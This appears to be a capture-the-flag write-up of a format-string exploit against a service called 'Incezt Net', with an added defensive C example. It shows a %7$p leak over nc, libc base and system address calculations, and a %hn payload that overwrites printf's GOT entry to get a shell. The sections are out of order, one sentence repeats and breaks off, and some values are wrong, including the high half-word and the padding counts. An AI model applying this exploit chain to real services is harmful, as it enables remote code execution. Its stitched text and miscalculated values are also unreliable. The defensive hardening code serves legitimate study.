Incezt Net May 2026

We compare the leaked address with known libc offsets (using libc-database or pwntools):

from pwn import *
leak = 0x7ffff7a5d690
# Offsets for libc6_2.31-0ubuntu9.9_amd64 (the version on the host)
puts_offset = 0x0809c0
libc_base = leak - puts_offset
log.info("libc base = %#x", libc_base)

The calculation yields a base address of 0x7ffff7a03000.

Now we can compute the address of system and the string "/bin/sh":

system_offset = 0x04f440
binsh_offset  = 0x1b3e9a
system_addr   = libc_base + system_offset   # 0x7ffff7a52440
binsh_addr    = libc_base + binsh_offset    # 0x7ffff7b5be9a

We have all we need to get a remote shell.


The program is dynamically linked, so we can leak a libc address from the GOT. The GOT entry for puts is a good target because it’s already resolved. We compare the leaked address with known libc

$ (printf "echo %7$p\n"; cat) | nc challenge.ctf.com 31137
Welcome to Incezt Net!
> %7$p
Result: 0x7ffff7a5d690

The output is a raw pointer printed by the %p format specifier. The exact position (%7$p) was discovered by trial and error (printing %1$p, %2$p, …) until we landed on a pointer that belongs to the libc region (0x7ffff7…).

Result: Leaked address 0x7ffff7a5d690.
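
The defensive side of the %7$p leak above, as an added example that is not part of the original write-up: the echo written with a constant format string, plus a check that flags positional and %n-class directives in untrusted input. The names echo_result and fmt_risk and the sample inputs are assumptions made for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern (comment only): printf(user_input);
 * The input itself becomes the format string, so "%7$p" prints a stack slot. */

/* Hardened echo: input is only ever data for a constant format string. */
int echo_result(char *out, size_t outlen, const char *user_input)
{
    return snprintf(out, outlen, "Result: %s", user_input);
}

/* Classify printf-style directives in untrusted text, for logging or rejection.
 * 0 = none, 1 = ordinary directive, 2 = positional (%N$...) or write (%n). */
int fmt_risk(const char *s)
{
    int risk = 0;
    for (; *s; s++) {
        if (*s != '%') continue;
        s++;
        if (*s == '\0') break;          /* trailing lone '%' */
        if (*s == '%') continue;        /* "%%" is a literal percent sign */
        const char *p = s;
        int positional = 0;
        while (isdigit((unsigned char)*p)) p++;
        if (p > s && *p == '$') { positional = 1; p++; }
        /* skip flags, width, precision and length modifiers */
        while (*p && strchr("-+ #0123456789.*hlqjzLt", *p)) p++;
        if (*p == '\0') break;          /* incomplete directive */
        if (positional || *p == 'n') return 2;
        if (strchr("diouxXeEfFgGaAcsp", *p)) risk = 1;
        s = p;
    }
    return risk;
}

int main(void)
{
    /* Constructed sample inputs, not captured traffic. */
    const char *samples[] = { "hello", "100%% sure", "%x %s", "%7$p" };
    char line[64];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        echo_result(line, sizeof line, samples[i]);
        printf("risk=%d  %s\n", fmt_risk(samples[i]), line);
    }
    return 0;
}
```

With the constant format string the input %7$p comes back as the literal text "Result: %7$p" instead of a pointer value.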

from pwn import *
# Target addresses
got_printf = 0x601040
system = 0x7ffff7a52440
# Split into two 2‑byte pieces (little endian)
low  = system & 0xffff          # 0x2440
high = (system >> 16) & 0xffff  # 0xa7a5
# Build the payload
payload  = p64(got_printf)          # will be %8$hn
payload += p64(got_printf + 2)      # will be %9$hn
# Calculate the padding needed (mod 0x10000)
# We start counting from the length of the two addresses (16 bytes)
cur = len(payload)
pad_low  = (low  - cur) % 0x10000
pad_high = (high - (cur + pad_low)) % 0x10000
payload += f"%{pad_low}c%8$hn".encode()
payload += f"%{pad_high}c%9$hn".encode()

The final string is something like (hex‑escaped for clarity):

\x40\x10\x60\x00\x00\x00\x00\x00\x42\x10\x60\x00\x00\x00\x00\x00%5828c%8$hn%17728c%9$hn